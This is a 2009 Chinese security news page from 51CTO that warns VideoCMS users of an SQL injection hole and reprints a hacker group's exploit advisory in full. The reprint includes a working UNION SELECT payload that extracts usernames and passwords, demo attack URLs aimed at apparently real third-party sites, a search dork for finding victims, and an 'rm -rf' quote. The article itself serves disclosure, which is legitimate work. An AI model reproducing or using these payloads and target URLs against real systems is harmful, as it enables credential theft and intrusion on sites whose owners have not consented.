VideoCMS存在SQL注入漏洞 使用此CMS的公司请做防范

原创
安全
VideoCMS存在SQL injection漏洞,使用此CMS的企业请做防范。

【51CTO.com综合消息】VideoCMS存在SQL injection漏洞,使用此CMS的公司请做防范。以下是51CTO编辑找到的测试代码,仅做测试,请勿用于非法用途。

[~] VideoCMS SQL injection vulnerability - (id)                                   #

[~] Author : kaMtiEz (kamzcrew@gmail.com)                                    #

[~] Homepage : http://www.indonesiancoder.com                                  #

[~] Date : Desember 14, 2009                                               #
                                                                                  #
###################################################################################

[ Software Information ]

[+] Vendor : http://www.codemight.com/
[+] Download : -
[+] version : 3.1 or lower maybe also affected
[+] Vulnerability : SQL injection
[+] Dork : "Think iT"
[+] Price : dunno           
[+] Location : INDONESIA - JOGJA
[+] description http://www.codemight.com/index.php?m=product&p=1

##################################################################################


[ HERE WE GO .. LIVE FROM JOGJA CITY ]

[ Vulnerable File ]

http://127.0.0.1/[kaMtiEz]/index.php?m=video&v=[VALID-ID][SQL]

[ Exploit ]

/**/and/**/1=2/**/union/**/all/**/select/**/666,666,@@version,concat_ws(0x3a,username,password),666,666,666/**/from/**/users--

[ Demo ]

http://mysingaporetube.com/index.php?m=video&v=502/**/and/**/1=2/**/union/**/all/**/select/**/666,666,@@version,concat_ws(0x3a,username,password),666,666,666/**/from/**/users--
http://www.codemight.com/videocms/index.php?m=video&v=23/**/and/**/1=2/**/union/**/all/**/select/**/666,666,@@version,concat_ws(0x3a,username,password),666,666,666/**/from/**/users--

===========================================================================

[ Thx TO ]
[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink
[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry ..
[+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk

[ NOTE ]

[+] Nyak ama babe gua .. tak lupa adik gua ..
[+] segelas vodka menemaniku setiap malam .. :P
[+] Dengerin Radio yach di http://antisecradio.fm ok coy ?

[ QUOTE ]

[+] rm -rf

[ EOF ]

[+] INDONESIANOCODER TEAM
[+] KILL -9 TEAM

【编辑推荐】

  1. Oracle数据库内部安全威胁:严重性
  2. 专题:网站常见的攻击与防御
  3. 卡巴斯基发布2010年网络威胁六项预测
  4. Web应用防火墙是如何为客户提供防护的
  5. 选择硬件防火墙时你应注意的十件事
  6. 深入理解防火墙 有效屏蔽外界的攻击
  7. 防火墙功能分类及其局限性介绍分析
责任编辑:王文文 来源: 51CTO.com
相关推荐

2012-12-19 10:36:06

2024-12-04 13:33:43

2009-07-20 15:37:09

iBatis like注入漏洞

2010-09-08 13:31:24

2010-10-22 15:18:18

SQL注入漏洞

2009-12-03 18:23:23

2013-01-14 11:26:27

2015-07-09 14:36:12

2009-11-02 13:47:09

2009-10-25 13:32:09

2021-09-16 09:05:45

SQL注入漏洞网络攻击

2009-02-12 10:14:16

2023-12-01 16:21:42

2018-03-29 10:16:04

2017-05-02 09:02:14

2024-10-12 10:57:21

2010-09-08 14:02:46

2012-11-16 11:50:11

2021-02-26 13:18:38

Node.js漏洞代码

2013-07-27 14:14:25

点赞
收藏

51CTO技术栈公众号